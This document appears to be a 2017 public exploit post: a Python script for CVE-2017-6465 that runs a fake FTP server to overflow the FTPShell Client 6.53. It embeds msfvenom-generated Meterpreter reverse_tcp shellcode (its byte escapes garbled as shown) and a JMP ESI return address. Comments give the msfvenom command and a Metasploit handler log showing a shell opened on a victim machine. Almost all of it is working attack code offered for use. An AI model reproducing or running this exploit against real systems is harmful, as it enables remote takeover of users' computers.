FTPShell Client 6.53 Buffer Overflow
Posted on 15 March 2017
#!/usr/bin/python #FTPShell Client 6.53 buffer overflow #By N_A , N_A[at]tutanota.com #Tested on Windows 7 Professional #Credit to Peter Baris for finding the vulnerability and also submitting the CVE and public exploit. #CVE: CVE-2017-6465 #Vendor Homepage: http://www.saptech-erp.com.au #Tested on: #Microsoft Windows 7 Professional #6.1.7601 Service Pack 1 Build 7601 #x64 #Some shout outz: #Burglekutt_Saunders - That Snapchat big mouth filter thing. Shit looks crazy af brother! #Beavdini - Out there in Bulgaria getting %100 percents on everything apart from coolness. Who knows..i might drop by sometime ;) #Z3yy3n - Fathergodding it are we soon? Havent had one for ages vato #Nuri - Happy Birthday :) #Anya - Rabbits are brave , run rabbit run :) #Y@hya - Purple eyed dude. Lets shave our heads brother #Baby_Melv1n - Thanks for being epically round. # msf > use exploit/multi/handler # msf exploit(handler) > set payload windows/meterpreter/reverse_tcp # payload => windows/meterpreter/reverse_tcp # msf exploit(handler) > set lhost 192.1.168.1 # lhost => 192.168.1.1 # msf exploit(handler) > set lport 443 # lport => 443 # msf exploit(handler) > exploit # [*] Started reverse TCP handler on 192.168.1.1:443 # [*] Starting the payload handler... #[*] Sending stage (957999 bytes) to 192.168.1.5 #[*] Meterpreter session 1 opened (192.168.1.1:443 -> 192.168.1.5:49237) at 2017-03-14 17:00:35 +0000 #meterpreter > shell #Process 3672 created. #Channel 1 created. #Microsoft Windows [Version 6.1.7601] #Copyright (c) 2009 Microsoft Corporation. All rights reserved. #C:Program FilesFTPShellClient> import socket import sys port = 21 #Replace LHOST with your own IP #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1 LPORT=443 EXITFUNC=thread -a x86 --platform Windows -b "x00x0ax0dx5cx22x27" -f python -e x86/shikata_ga_nai #Payload size: 381 bytes buf = "" buf += "xdbxdfxd9x74x24xf4x5ex29xc9xbfxa5x89x6c" buf += "xf6xb1x59x31x7ex19x03x7ex19x83xc6x04x47" buf += "x7cx90x1ex05x7fx69xdfx69x09x8cxeexa9x6d" buf += "xc4x41x19xe5x88x6dxd2xabx38xe5x96x63x4e" buf += "x4ex1cx52x61x4fx0cxa6xe0xd3x4exfbxc2xea" buf += "x81x0ex02x2axffxe3x56xe3x74x51x47x80xc0" buf += "x6axecxdaxc5xeax11xaaxe4xdbx87xa0xbfxfb" buf += "x26x64xb4xb5x30x69xf0x0cxcax59x8fx8ex1a" buf += "x90x70x3cx63x1cx83x3cxa3x9bx7bx4bxddxdf" buf += "x06x4cx1ax9dxdcxd9xb9x05x97x7ax66xb7x74" buf += "x1cxedxbbx31x6axa9xdfxc4xbfxc1xe4x4dx3e" buf += "x06x6dx15x65x82x35xcex04x93x93xa1x39xc3" buf += "x7bx1ex9cx8fx96x4bxadxcdxfexb8x9cxedxfe" buf += "xd6x97x9exccx79x0cx09x7dxf2x8axcex82x29" buf += "x6ax40x7dxd1x8bx48xbax85xdbxe2x6bxa5xb7" buf += "xf2x94x70x2dxf6x02x70xb9xf8xa5xecxbfxf8" buf += "x48x57x36x1ex1axf7x19x8fxdbxa7xd9x7fxb4" buf += "xadxd5xa0xa4xcex3fxc9x4fx20x96xa1xe7xd9" buf += "xb3x3ax99x26x6ex47x99xacx9bxb7x54x44xe9" buf += "xabx81x35x11x34x52xdfx11x5ex56x49x45xf6" buf += "x54xacxa1x59xa6x9bxb1x9ex58x5dx80xd5x6f" buf += "xcbxacx81x8fx1bx2dx52xc6x71x2dx3axbex21" buf += "x7ex5fxc1xfcx12xccx54xfex42xa0xffx96x68" buf += "x9fxc8x39x92xcax4ax3dx6cx88x6exe5x05x72" buf += "x2fx15xd6x18xafx45xbexd7x80x6ax0ex17x0b" buf += "x23x06x92xdax86xb7xa3xf6x46x66xa3xf5x52" buf += "x7fx2axf9x65x80xccxc6xb0xb9xbax0fx01xfe" buf += "xa5x8dxafx0bx4ex08x3axb6x13xabx91xf5x2d" buf += "x28x13x86xc9x30x56x83x96xf6x8bxf9x87x92" buf += "xabxaexa8xb6" #Exploitation requires a buffer of exactly 400 bytes. From there on EIP is overwritten. ESI contains our buffer. #400 bytes + EIP will redirect execution eip = "xDCx95x4B" #JMP ESI; retn , located @ 0x004B95DC in FtpShell.exe , address works perfectly. nops = "x90" * 10 padding = "A" * 9 buffer = nops + buf + padding + eip try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.bind(("0.0.0.0",port)) s.listen(5) print(" [*]FTPShell Client 6.53 buffer overflow[*]") print("[*] By N_A [*]") print(" [*]Fake FTP Daemon started[*] ") print("[*]Awaiting for victim to connect[*] ") except: print("[*] Failed to bind the server to port ") while True: conn, addr = s.accept() conn.send("220 GutenTag Vater ") print(conn.recv(1024)) conn.send("331 OK ") print(conn.recv(1024)) conn.send("230 OK ") print(conn.recv(1024)) conn.send('220 "'+buffer+'" is current directory ') print("[*]Evil buffer sent. g0t sh3ll?[*] ")
